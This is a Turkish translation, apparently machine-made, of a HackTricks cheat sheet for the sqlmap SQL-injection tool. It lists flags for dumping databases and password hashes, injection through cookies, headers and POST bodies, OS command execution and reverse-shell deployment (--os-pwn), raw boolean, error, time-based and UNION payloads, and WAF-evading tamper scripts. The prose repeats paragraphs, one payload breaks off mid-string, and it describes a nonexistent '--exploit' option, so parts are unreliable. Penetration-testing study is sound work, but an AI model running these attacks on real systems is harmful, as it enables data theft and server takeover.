hacktricks/pentesting-web/sql-injection/sqlmap.md
2024-02-10 18:14:16 +00:00

26 KiB
Raw Blame History

AWS hackleme becerilerini sıfırdan kahraman seviyesine kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

SQLmap için temel argümanlar

Genel

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

Bilgi Al

İçerik

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB

DB verileri

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8316=8316

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 8316 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(8316=8316,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8316 FROM (SELECT(SLEEP(5)))a)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=-9999 UNION ALL SELECT NULL,CONCAT(0x717a6a7071,0x4e4e4e4e4e546d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Enjeksiyon Yeri

Burp/ZAP Yakalamadan

İsteği yakalayın ve req.txt adında bir dosya oluşturun

sqlmap -r req.txt --current-user

GET İstek Enjeksiyonu

SQLMap

SQLMap, SQL enjeksiyonu saldırılarını otomatik olarak tespit etmek ve bu saldırıları gerçekleştirmek için kullanılan popüler bir araçtır. SQLMap, hedef web uygulamasının GET isteklerine SQL enjeksiyonu yapmak için kullanılabilir.

SQLMap ile GET İstek Enjeksiyonu

SQLMap'i kullanarak GET isteklerine SQL enjeksiyonu yapmak için aşağıdaki adımları izleyebilirsiniz:

  1. SQLMap'i çalıştırın ve hedef URL'yi belirtin:

    sqlmap -u "http://example.com/page.php?id=1"
    
  2. SQLMap, hedef URL'yi analiz edecek ve SQL enjeksiyonu açıklarını tespit etmek için otomatik olarak testler yapacaktır.

  3. SQLMap, hedef URL'de SQL enjeksiyonu açığı tespit ederse, size bu açığı kullanmak için seçenekler sunacaktır. Örneğin, veritabanı tablolarını listeleyebilir, verileri çekebilir veya hatta komutları yürütebilirsiniz.

  4. SQLMap, hedef URL'de SQL enjeksiyonu açığı tespit etmezse, farklı parametrelerle deneme yapabilir veya manuel olarak SQL enjeksiyonu yapmak için diğer araçları kullanabilirsiniz.

Örnek

Aşağıdaki örnek, SQLMap'i kullanarak GET isteklerine SQL enjeksiyonu yapmayı göstermektedir:

sqlmap -u "http://example.com/page.php?id=1" --dbs

Bu komut, hedef URL'deki veritabanı tablolarını listeleyecektir.

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST İstek Enjeksiyonu

When performing a POST request injection, you need to identify the parameters that are being sent in the body of the request. These parameters can be found in the request payload or in the form data.

POST istek enjeksiyonu yaparken, isteğin gövdesinde gönderilen parametreleri belirlemeniz gerekmektedir. Bu parametreler istek yükünde veya form verilerinde bulunabilir.

To inject SQL code into a POST request, you can use tools like SQLMap. SQLMap is a powerful tool that automates the process of detecting and exploiting SQL injection vulnerabilities.

POST isteğine SQL kodu enjekte etmek için SQLMap gibi araçları kullanabilirsiniz. SQLMap, SQL enjeksiyon açıklarını tespit etme ve sömürme sürecini otomatikleştiren güçlü bir araçtır.

To use SQLMap with a POST request, you need to provide the URL of the target, the parameter to be injected, and the payload to be used. SQLMap will then analyze the response and determine if the parameter is vulnerable to SQL injection.

SQLMap'i bir POST isteğiyle kullanmak için, hedefin URL'sini, enjekte edilecek parametreyi ve kullanılacak yükü sağlamanız gerekmektedir. SQLMap, ardından yanıtı analiz edecek ve parametrenin SQL enjeksiyonuna karşı savunmasız olup olmadığını belirleyecektir.

Here is an example command to use SQLMap with a POST request:

İşte bir POST isteğiyle SQLMap kullanmak için bir örnek komut:

sqlmap -u "http://example.com/login" --data "username=admin&password=pass" -p "username" --method POST

In this example, we are targeting the login page of "http://example.com" and injecting the "username" parameter. The payload is provided in the --data option, where we specify the values for the "username" and "password" parameters.

Bu örnekte, "http://example.com" adresindeki giriş sayfasını hedef alıyoruz ve "username" parametresine enjeksiyon yapıyoruz. Yük, --data seçeneğinde sağlanır ve "username" ve "password" parametreleri için değerleri belirtiriz.

By using SQLMap, you can automate the process of injecting SQL code into POST requests and quickly identify any SQL injection vulnerabilities in the target application.

SQLMap kullanarak, SQL kodunu POST isteklerine enjekte etme sürecini otomatikleştirebilir ve hedef uygulamadaki SQL enjeksiyon açıklarını hızlı bir şekilde tespit edebilirsiniz.

sqlmap -u "http://example.com" --data "username=*&password=*"

Başlık ve Diğer HTTP Metotlarında Enjeksiyonlar

HTTP Başlıklarında Enjeksiyon

Bazı durumlarda, web uygulamaları HTTP başlıklarını kullanarak veri alışverişi yapar. Bu başlıklar, kullanıcıdan gelen verileri almak veya sunucuya göndermek için kullanılır. SQL enjeksiyonu gibi saldırılar, bu başlıkların güvenli olmadığı durumlarda gerçekleştirilebilir.

SQL enjeksiyonu için kullanılan bazı başlıklar şunlardır:

  • User-Agent
  • Referer
  • Cookie
  • Accept-Language
  • Accept-Encoding

Bu başlıkların içeriği, sunucu tarafında işlenirken, kullanıcı tarafından kontrol edilebilir. Bu nedenle, bu başlıklara yapılan enjeksiyonlar, saldırganın SQL kodunu sunucuya göndermesine olanak tanır.

Diğer HTTP Metotlarında Enjeksiyon

HTTP protokolü, GET ve POST dışında da birçok farklı metot sunar. Bu metotlar, web uygulamalarının farklı işlemleri gerçekleştirmesine olanak tanır. SQL enjeksiyonu gibi saldırılar, bu metotların güvenli olmadığı durumlarda gerçekleştirilebilir.

SQL enjeksiyonu için kullanılan bazı HTTP metotları şunlardır:

  • PUT
  • DELETE
  • OPTIONS
  • TRACE

Bu metotlar, sunucuya veri göndermek veya sunucudan veri almak için kullanılır. Saldırgan, bu metotları kullanarak SQL kodunu sunucuya enjekte edebilir ve istediği işlemi gerçekleştirebilir.

SQLMap ile Enjeksiyon Tespiti

SQLMap, otomatik bir SQL enjeksiyon aracıdır. Bu araç, web uygulamalarında SQL enjeksiyonu açıklarını tespit etmek ve saldırıları gerçekleştirmek için kullanılır. SQLMap, farklı HTTP metotlarında ve başlıklarda enjeksiyonları tespit etmek için kullanılabilir.

SQLMap kullanarak enjeksiyon tespiti yapmak için aşağıdaki komutu kullanabilirsiniz:

sqlmap -u <URL> --method <HTTP_METODU> --headers "<BAŞLIKLAR>"

Bu komutu kullanarak SQLMap'i belirli bir URL, HTTP metodu ve başlıklarla çalıştırabilirsiniz. SQLMap, enjeksiyon tespiti yapmak için otomatik olarak SQL sorguları oluşturacak ve sonuçları analiz edecektir.

SQLMap, enjeksiyon tespiti yaparken dikkatli olunması gereken bir araçtır. Yasal izinlerle ve etik kurallara uygun olarak kullanılmalıdır.

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

İkinci derece enjeksiyon

Second order injection, bir web uygulamasında SQL enjeksiyonu saldırısının gerçekleştirildiği bir senaryodur. Bu saldırı türünde, kullanıcı tarafından sağlanan verilerin doğrudan SQL sorgularına enjekte edilmediği, ancak verilerin bir veritabanına kaydedildiği ve daha sonra başka bir sorguda kullanıldığı durumlar hedef alınır.

Bu saldırı türü, web uygulamasının güvenlik kontrollerini aşmak için kullanılır. İkinci derece enjeksiyon saldırısı gerçekleştirmek için, saldırgan öncelikle kullanıcı tarafından sağlanan verilerin nasıl işlendiğini ve depolandığını anlamalıdır. Ardından, saldırgan, veritabanına kaydedilen verilerin bir sonraki sorguda nasıl kullanıldığını belirlemek için bu verileri izlemelidir.

İkinci derece enjeksiyon saldırıları, saldırganın veritabanında saklanan verileri manipüle etmesine ve hedef uygulamada istenmeyen işlemler gerçekleştirmesine olanak tanır. Bu tür bir saldırı, veritabanı tablolarını değiştirmek, verileri silmek veya çalmak, hatta sistemde komut çalıştırmak gibi ciddi sonuçlara yol açabilir.

Saldırganlar, ikinci derece enjeksiyon saldırılarını gerçekleştirmek için SQL enjeksiyon araçlarından yararlanabilirler. Bu araçlar, saldırganlara hedef uygulamada ikinci derece enjeksiyon açıklarını tespit etmek ve sömürmek için gerekli olan otomatik işlevleri sağlar.

İkinci derece enjeksiyon saldırılarına karşı korunmak için, web uygulamalarının kullanıcı tarafından sağlanan verileri doğru bir şekilde işlemesi ve güvenlik kontrolleri uygulaması önemlidir. Verilerin doğru bir şekilde filtrelenmesi ve parametrelerin yerine geçirilmesi, ikinci derece enjeksiyon saldırılarının önlenmesine yardımcı olabilir. Ayrıca, güncel güvenlik yamalarının uygulanması ve güvenlik testlerinin düzenli olarak yapılması da önemlidir.

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Kabuk

SQLMap, hedef web uygulamasında SQL enjeksiyonu saldırılarını otomatik olarak gerçekleştirmek için kullanılan bir araçtır. SQLMap, hedef uygulamada SQL enjeksiyonu açıklarını tespit etmek ve bu açıkları kullanarak veritabanına erişim sağlamak için kullanılır.

SQLMap, bir hedef web uygulamasına saldırmak için çeşitli teknikler kullanır. Bu teknikler arasında UNION tabanlı saldırılar, Boolean tabanlı saldırılar, zaman tabanlı saldırılar ve diğerleri bulunur. SQLMap, hedef uygulamada SQL enjeksiyonu açığı tespit edildiğinde, otomatik olarak uygun saldırı tekniklerini kullanarak veritabanına erişim sağlar.

SQLMap, hedef uygulamada SQL enjeksiyonu açığı tespit etmek için çeşitli yöntemler kullanır. Bu yöntemler arasında otomatik tarama, manuel tarama ve tam tarama bulunur. SQLMap, hedef uygulamada SQL enjeksiyonu açığı tespit ettiğinde, kullanıcıya veritabanına erişim sağlamak için bir kabuk sunar.

SQLMap kabuğu, kullanıcının hedef veritabanında SQL sorgularını çalıştırmasına olanak tanır. Bu kabuk, kullanıcının veritabanında veri okumasını, veri yazmasını ve hatta veritabanını tamamen kontrol etmesini sağlar. SQLMap kabuğu, kullanıcının hedef veritabanında istediği işlemleri gerçekleştirmesine olanak tanır.

SQLMap kabuğu, kullanıcının hedef veritabanında SQL sorgularını çalıştırmasına olanak tanır. Bu kabuk, kullanıcının veritabanında veri okumasını, veri yazmasını ve hatta veritabanını tamamen kontrol etmesini sağlar. SQLMap kabuğu, kullanıcının hedef veritabanında istediği işlemleri gerçekleştirmesine olanak tanır.

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

SQLmap ile bir web sitesini tarama ve otomatik olarak saldırı gerçekleştirme

SQLmap, SQL enjeksiyonu saldırılarını otomatik olarak gerçekleştirmek için kullanılan bir araçtır. Bu araç, hedef web sitesini tarayarak SQL enjeksiyonu açıklarını tespit eder ve otomatik olarak saldırı gerçekleştirir.

SQLmap'ı kullanarak bir web sitesini taramak ve otomatik olarak saldırı gerçekleştirmek için aşağıdaki adımları izleyebilirsiniz:

  1. SQLmap'ı çalıştırın ve hedef web sitesinin URL'sini belirtin:

    sqlmap -u <hedef-URL>
    
  2. SQLmap, hedef web sitesini tarayacak ve SQL enjeksiyonu açıklarını tespit edecektir. Bu işlem biraz zaman alabilir.

  3. SQLmap, tespit edilen SQL enjeksiyonu açıklarını otomatik olarak saldırıya dönüştürebilir. Saldırıyı gerçekleştirmek için aşağıdaki komutu kullanın:

    sqlmap -u <hedef-URL> --exploit
    
  4. SQLmap, hedef web sitesine SQL enjeksiyonu saldırısı gerçekleştirerek veritabanına erişmeye çalışacaktır. Başarılı bir saldırı durumunda, SQLmap, veritabanındaki bilgileri çekebilir veya değiştirebilir.

Bu adımları izleyerek SQLmap'i kullanarak bir web sitesini tarama ve otomatik olarak saldırı gerçekleştirme işlemini gerçekleştirebilirsiniz. Ancak, bu tür saldırıları yalnızca yasal ve etik sınırlar içinde gerçekleştirmeniz önemlidir.

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Bir ek sonek belirleme

Bazı durumlarda, SQL enjeksiyonu saldırısını özelleştirmek isteyebilirsiniz. SQLMap, bu amaçla bir dizi seçenek sunar. Bunlardan biri, enjeksiyonu hedef URL'ye bir ek sonek ekleyerek gerçekleştirir.

Bu seçeneği kullanmak için, --suffix parametresini kullanarak bir sonek belirlemeniz gerekmektedir. Örneğin, --suffix=' UNION SELECT NULL, NULL, NULL-- şeklinde bir sonek belirleyebilirsiniz.

Bu sonek, SQLMap tarafından enjeksiyonu gerçekleştirmek için kullanılan SQL ifadesine eklenir. Bu sayede, hedef uygulama üzerinde daha fazla kontrol sağlayabilirsiniz.

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Önek

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Boolean enjeksiyonunu bulmaya yardım

Boolean enjeksiyonu, bir web uygulamasında SQL enjeksiyonu saldırısı gerçekleştirmek için kullanılan bir tekniktir. Bu saldırıda, uygulamanın SQL sorgularında mantıksal ifadelerin sonuçlarını kontrol etmek için kullanılan boolean (doğru/yanlış) değerlerini manipüle etmek amaçlanır.

Boolean enjeksiyonunu bulmak için aşağıdaki adımları izleyebilirsiniz:

  1. Uygulamanın giriş alanlarını ve parametrelerini belirleyin.
  2. Giriş alanlarına veya parametrelerine mantıksal ifadeler ekleyin ve sonuçları gözlemleyin.
  3. Eğer uygulama hata mesajları veya farklı davranışlar döndürüyorsa, bu durumları analiz edin ve mantıksal ifadelerin sonuçlarını manipüle etmek için kullanabileceğiniz ipuçlarını arayın.
  4. Boolean enjeksiyonu için SQLMap gibi otomatik araçları kullanabilirsiniz. Bu araçler, uygulamanın SQL sorgularını otomatik olarak analiz eder ve boolean enjeksiyonu için uygun parametreleri tespit eder.

Boolean enjeksiyonu, web uygulamalarında yaygın bir güvenlik açığıdır ve saldırganlara veritabanı bilgilerine erişim sağlama veya yetkisiz veri çekme gibi tehlikeli eylemler gerçekleştirme imkanı verir. Bu nedenle, web uygulamalarınızı güvende tutmak için düzenli olarak güvenlik testleri yapmanız önemlidir.

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

ıklama:

SQLMap, SQL enjeksiyon saldırılarını gerçekleştirmek için kullanılan bir araçtır. SQLMap, hedef web uygulamasının SQL enjeksiyon açıklarını otomatik olarak tespit eder ve bu açıkları kullanarak veritabanına erişim sağlar. SQLMap, hedef web uygulamasının veritabanına sızma yeteneğine sahip olduğu için oldukça güçlü bir araçtır.

SQLMap, SQL enjeksiyon saldırılarını gerçekleştirmek için çeşitli teknikler kullanır. Bu tekniklerden biri de "tamper" olarak adlandırılır. Tamper, SQLMap'in saldırıları gerçekleştirirken SQL sorgularını değiştirmesine olanak tanır. Bu, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve daha etkili bir şekilde veritabanına erişim sağlamasına yardımcı olur.

SQLMap'in tamper özelliği, SQL sorgularını değiştirmek için çeşitli teknikler sunar. Bu teknikler, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına yardımcı olur. Örneğin, SQLMap, SQL sorgularını karıştırabilir, boşlukları kaldırabilir, komutları değiştirebilir veya sorguları şifreleyebilir. Bu teknikler, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve veritabanına erişim sağlamasına yardımcı olur.

SQLMap'in tamper özelliği, SQL enjeksiyon saldırılarını gerçekleştirirken kullanılabilir. Bu özellik, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve veritabanına erişim sağlamasına yardımcı olur. Tamper, SQLMap'in saldırıları gerçekleştirirken SQL sorgularını değiştirmesine olanak tanır. Bu, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve daha etkili bir şekilde veritabanına erişim sağlamasına yardımcı olur.

Kullanım:

Tamper özelliğini kullanmak için, SQLMap komutuna --tamper parametresini eklemeniz gerekmektedir. Bu parametre, SQLMap'e hangi tamper tekniklerini kullanması gerektiğini belirtir. Örneğin:

sqlmap -u "http://example.com/vuln.php?id=1" --tamper=space2comment

Bu komut, SQLMap'in space2comment tamper tekniğini kullanarak SQL sorgularını değiştirmesini sağlar. Bu teknik, SQL sorgularındaki boşlukları yorumlara dönüştürerek güvenlik önlemlerini atlamaya yardımcı olur.

Tamper özelliği, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına yardımcı olur. Bu özellik, SQLMap'in saldırıları gerçekleştirirken SQL sorgularını değiştirmesine olanak tanır. Bu, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve daha etkili bir şekilde veritabanına erişim sağlamasına yardımcı olur.

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper ıklama
apostrophemask.py Apostrof karakterini UTF-8 tam genişlikli karşılığıyla değiştirir
apostrophenullencode.py Apostrof karakterini yasaklı çift unicode karşılığıyla değiştirir
appendnullbyte.py Kodun sonuna kodlanmış NULL bayt karakteri ekler
base64encode.py Verilen koddaki tüm karakterleri Base64'e dönüştürür
between.py Büyük olan operatörü '&gt;' 'NOT BETWEEN 0 AND #' ile değiştirir
bluecoat.py SQL ifadesinden sonra boşluk karakterini geçerli bir rastgele boş karakterle değiştirir. Ardından karakteri '=' ile LIKE operatörüyle değiştirir
chardoubleencode.py Verilen kodun tüm karakterlerini çift url-kodlar zaten kodlanmış olanları işlemlemez
commalesslimit.py 'LIMIT M, N' gibi örnekleri 'LIMIT N OFFSET M' ile değiştirir
commalessmid.py 'MID(A, B, C)' gibi örnekleri 'MID(A FROM B FOR C)' ile değiştirir
concat2concatws.py 'CONCAT(A, B)' gibi örnekleri 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' ile değiştirir
charencode.py Verilen kodun tüm karakterlerini url-kodlar zaten kodlanmış olanları işlemlemez
charunicodeencode.py Verilen kodun kodlanmamış karakterlerini unicode-url-kodlar zaten kodlanmış olanları işlemlemez. "%u0022"
charunicodeescape.py Verilen kodun kodlanmamış karakterlerini unicode-url-kodlar zaten kodlanmış olanları işlemlemez. "\u0022"
equaltolike.py Tüm eşitlik operatörü '=' örneklerini 'LIKE' operatörüyle değiştirir
escapequotes.py Tırnak işaretlerini ' ve " kaçış karakteriyle değiştirir
greatest.py Büyük olan operatörü '&gt;' 'GREATEST' karşılığıyla değiştirir
halfversionedmorekeywords.py Her anahtar kelimenin önüne sürüm bilgisi ekler
ifnull2ifisnull.py 'IFNULL(A, B)' gibi örnekleri 'IF(ISNULL(A), B, A)' ile değiştirir
modsecurityversioned.py Tam sorguyu sürümlendirilmiş yorumla kapsar
modsecurityzeroversioned.py Tam sorguyu sıfır sürümlü yorumla kapsar
multiplespaces.py SQL anahtar kelimelerinin etrafına birden fazla boşluk ekler
nonrecursivereplacement.py Değiştirme için uygun temsilcilerle önceden tanımlanmış SQL anahtar kelimelerini değiştirir (örneğin .replace("SELECT", ""))
percentage.py Her karakterin önüne bir yüzde işareti '%' ekler
overlongutf8.py Verilen kodun tüm karakterlerini dönüştürür zaten kodlanmış olanları işlemlemez
randomcase.py Her anahtar kelime karakterini rastgele bir büyük/küçük harf değeriyle değiştirir
randomcomments.py SQL anahtar kelimelerine rastgele yorumlar ekler
securesphere.py Özel oluşturulmuş bir dize ekler
sp_password.py Otomatik olarak gizlenmek için kodun sonuna 'sp_password' ekler
space2comment.py Boşluk karakterini ' ' yorumlarla değiştirir
space2dash.py Boşluk karakterini ' ' tire yorumu '--' ile değiştirir ve ardından rastgele bir dize ve yeni satır '\n' ekler
space2hash.py Boşluk karakterini ' ' bir diyez karakteri '\#' ile değiştirir ve ardından rastgele bir dize ve yeni satır '\n' ekler
space2morehash.py Boşluk karakterini ' ' bir diyez karakteri '\#' ile değiştirir ve ardından rastgele bir dize ve yeni satır '\n' ekler
space2mssqlblank.py Boşluk karakterini ' ' geçerli bir alternatif karakter kümesinden rastgele bir boş karakterle değiştirir
space2mssqlhash.py Boşluk karakterini ' ' bir diyez karakteri '\#' ile değiştirir ve ardından yeni satır '\n' ekler
space2mysqlblank.py Boşluk karakterini ' ' geçerli bir alternatif karakter kümesinden rastgele bir boş karakterle değiştirir
space2mysqldash.py Boşluk karakterini ' ' tire yorumu '--' ile değiştirir ve ardından yeni satır '\n' ekler
space2plus.py Boşluk karakterini ' ' artı işareti '+' ile değiştirir
space2randomblank.py Boşluk karakterini ' ' geçerli bir alternatif karakter kümesinden rastgele bir boş karakterle değiştirir
symboliclogical.py AND ve OR mantıksal operatörlerini sembolik karşılıklarıyla (&& ve
unionalltounion.py UNION ALL SELECT ifadesini UNION SELECT ile değiştirir
unmagicquotes.py Tırnak işaretini ' çoklu baytlı bir kombinasyon %bf%27 ile değiştirir ve sonuna genel bir yorum ekler çalışması için
uppercase.py Her anahtar kelime karakterini büyük harf değeriyle değiştirir 'INSERT'
varnish.py Bir HTTP başlığı 'X-originating-IP' ekler
versionedkeywords.py Her işlev olmayan anahtar kelimeyi sürümlendirilmiş MySQL yorumuyla çevreler
versionedmorekeywords.py Her anahtar kelimeyi sürümlendirilmiş MySQL yorumuyla çevreler
xforwardedfor.py Sahte bir HTTP başlığı 'X-Forwarded-For' ekler
AWS hackleme konusunda sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları: